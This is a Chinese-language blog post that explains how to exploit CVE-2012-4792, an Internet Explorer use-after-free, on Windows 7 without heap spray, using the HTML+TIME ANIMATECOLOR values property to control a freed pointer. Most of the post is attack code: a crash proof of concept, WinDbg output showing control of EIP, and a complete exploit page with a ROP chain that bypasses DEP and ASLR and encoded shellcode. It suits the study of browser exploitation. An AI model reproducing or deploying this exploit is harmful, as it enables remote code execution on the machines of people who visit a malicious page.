CVE-2012-4792 Exploit Without HeapSpary

前面的一篇用HeapSpary完成了在win7下绕过DEP及ASLR的利用,这次同样一CVE-2012-4792做为例子,前面读国外一篇文章:

http://blog.exodusintel.com/2013/01/02/happy-new-year-analysis-of-cve-2012-4792/

文章提到用一种叫“HTML+TIME”的东西,通过该方法可以实现不需要Heap Spary就能完成exploit,具体说明如下:

引用HTML+TIME的代码如下:
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
        <meta>
                <?IMPORT namespace="t" implementation="#default#time2">
        </meta>
.
.
.
    <t:ANIMATECOLOR id="myanim"/>
接下来只需要构造ANIMATECOLOR的value属性,该属性可参考上面的最后一个知识库链接,构造如下:
animvalues = "\u4141\u4141"
while(animvalues.length < 0xDC) {
     animvalues += animvalues
}
for(i = 0; i < 21; i++) {
     animvalues += ";cyan";
}
最终产生的字符串如下形式:
“\u4141\u4141....;cyan;cyan;cyan;cyan;”
每个分号作为分隔符,这样一共22组,接下来将这个字符串通过以下方式赋值给ANIMATECOLOR的value属性:
try {
     a = document.getElementById('myanim');
     a.values = animvalues;
}
catch(e) {}
由于ANIMATECOLOR的特性,a.values会根据字符串的格式来申请堆空间,申请的空间大小取决于字符串被分号分割的项数,分配后的堆空间将用每一个项(分号分割的项)的地址来进行初始化,这里将会申请22*4个字节的堆空间,即0x58大小,每个DWORD保存每一项的地址,因此我们就控制了内存中一个指针,并能够控制该指针指向的数据,接下来就可以进行exploit了:
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          animvalues = "\u4141\u4141"
     while(animvalues.length < 0xDC)
          {
          animvalues += animvalues
       }
     for(i = 0; i < 21; i++)
       {
          animvalues += ";cyan";
       }
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          CollectGarbage();
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<body onload="eval(helloWorld())">
     <t:ANIMATECOLOR id="myanim"/>
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>
windbg挂载后的奔溃信息如下:
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00199c60 ebx=0021d0a8 ecx=00000052 edx=00000000 esi=00000000 edi=00216468
eip=41414141 esp=020df830 ebp=020df8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
41414141 ??              ???
0:008> dd edi
00216468  00199c60 02e1ebc0 0023f5c0 0023f5d8
00216478  0023f578 0016bda0 0016bbd8 00187da0
00216488  0333bce0 0333bcf8 0333bd10 0333bd28
00216498  0333bd40 0333bd58 0333bd70 0333bd88
002164a8  0333bda0 0333bdb8 0333bdd0 0333bde8
002164b8  0333be00 0333be18 eaa84100 ff080000
002164c8  000000fe 00000000 00000000 00000000
002164d8  00000000 00000000 00000000 00000000
0:008> dc poi(edi)
00199c60  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c70  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c80  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199c90  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199ca0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cb0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cc0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
00199cd0  41414141 41414141 41414141 41414141  AAAAAAAAAAAAAAAA
0:008> dc poi(edi+4)
02e1ebc0  00790063 006e0061 02e80000 00000000  c.y.a.n.........
02e1ebd0  eaf06f92 ff080167 02e235dc 001f9038  .o..g....5..8...
02e1ebe0  02e8e12c 00000000 eaf06f95 ff0c0100  ,........o......
02e1ebf0  6359d910 00000001 001f9028 00000000  ..Yc....(.......
02e1ec00  eaf06f68 ff0c010a 00000000 00000000  ho..............
02e1ec10  00000001 00000000 eaf06f6b ff080100  ........ko......
02e1ec20  0021cfd0 001f9038 02e1eb78 00000000  ..!.8...x.......
02e1ec30  00000000 00000000 00000000 00000000  ................
0:008> dc poi(edi+8)
0023f5c0  00790063 006e0061 00200000 00000000  c.y.a.n... .....
0023f5d0  eaabd9a2 ff0e0100 00790063 006e0061  ........c.y.a.n.
0023f5e0  00200000 00000000 eaabd9a5 ff080100  .. .............
0023f5f0  00148098 00000001 1690030b 01700d8c  ..............p.
0023f600  eaabd9d8 ff080100 0063006e 006c0061  ........n.c.a.l.
0023f610  00700072 00000063 eaabd9db ff0c0100  r.p.c...........
0023f620  00000002 50000001 50000007 02db1318  .......P...P....
0023f630  eaabd9de ff0a0100 0074006e 00760073  ........n.t.s.v.
可以看到edi指向一块大小为0x58的堆空间,指向前面分配的字符串。这样我们就可以控制一个指针以及指针中的数据了,用前一篇文章用的ROP链,
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
     <?IMPORT namespace="t" implementation="#default#time2">
</meta>
     <script>
     location.href = 'ms-help://'
     function helloWorld() {
          var e0 = null;
          var e1 = null;
          var e2 = null;
          animvalues = 
          "\u34b4\u51bf\u10b8\u51bd\u2d97\u51bd\ucba0\u51bd"+
          "\u79e2\u51c3\u9683\u51c5\u6fbd\u51c5\ufffe\ua17f"+
          "\u1e01\u51c1\u92d8\u51c3\ue67d\u51bf\u6fbd\u51c5"+
          "\ufc3d\ua17f\u1e01\u51c1\u592b\u51bf\ucf3e\u51be"+
          "\ud150\u51c5\uf563\u51be\u7402\u51c0\u6fbd\u51c5"+
          "\u9090\u9090\ua8dc\u51bd"+               //ROP End
          "\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090"+
          "\u9090\u9090\u9090\u9090\u9090\u9090\u4a41\u51be"+
          "\u9090\u9090"+
          "\uc481\uf254\uffff\u2ebf\ue4ed\udbc0\ud9c8\u2474" +
          "\u58f4\uc933\u33b1\u7831\u0312\u1278\uee83\u06e9" +
          "\u1235\u4f19\ueab6\u30da\u0f3e\u62eb\u4424\ub35e" +
          "\u082e\u3853\ub862\u4ce0\ucfab\ufa41\ufe8d\uca52" +
          "\uac11\u4c91\uaeee\uaec5\u61cf\uae18\u9f08\ue2d3" +
          "\ud4c1\u1346\ua865\u125a\ua7a9\u6ce3\u77cc\uc697" +
          "\ua7cf\u5c08\u5f87\u3a22\u5e38\u58e7\u2904\uab8c" +
          "\ua8fe\ue244\u9bff\ua9a8\u14c1\ub325\u9206\uc6d6" +
          "\ue17c\ud16b\u9846\u54b7\u3a5b\uce33\ubbbf\u8990" +
          "\ub734\udd5d\udb13\u3260\ue728\ub5e9\u6eff\u91a9" +
          "\u2bdb\ubb69\u917a\uc4dc\u7d9d\u6080\u6fd5\u13d5" +
          "\ue5b4\u9128\u40c2\ua92a\ue2cc\u9843\u6d47\u2513" +
          "\uca82\u6feb\u7a8f\u3664\u3f45\uc9e9\u03b3\u4a14" +
          "\ufb36\u52e3\ufe33\ud4a8\u72af\ub0a0\u21cf\u90c1" +
          "\ua4b3\u7851\u431a\u1bd2\u4162";

     for(i = 0; i < 21; i++)
       {
          animvalues += ";cyan";
       }
          try {
               e0 = document.getElementById("a");
               e1 = document.getElementById("b");
               e2 = document.createElement("q");
               e1.applyElement(e2);
               e1.appendChild(document.createElement('button'));
               e1.applyElement(e0);
               e2.outerText = "";
               e2.appendChild(document.createElement('body'));
          } catch(e) { }
          CollectGarbage();
          try {
               a = document.getElementById('myanim');
               a.values = animvalues;
          }
          catch(e) {}


     }

     </script>
</head>
<body onload="eval(helloWorld())">
     <t:ANIMATECOLOR id="myanim"/>
     <form id="a">
     </form>
     <dfn id="b">
     </dfn>
</body>
</html>

这样就可以不通过HeapSpary完成漏洞的利用。

posted @ 2014-07-30 20:49  Lamboy  阅读(582)  评论(0编辑  收藏  举报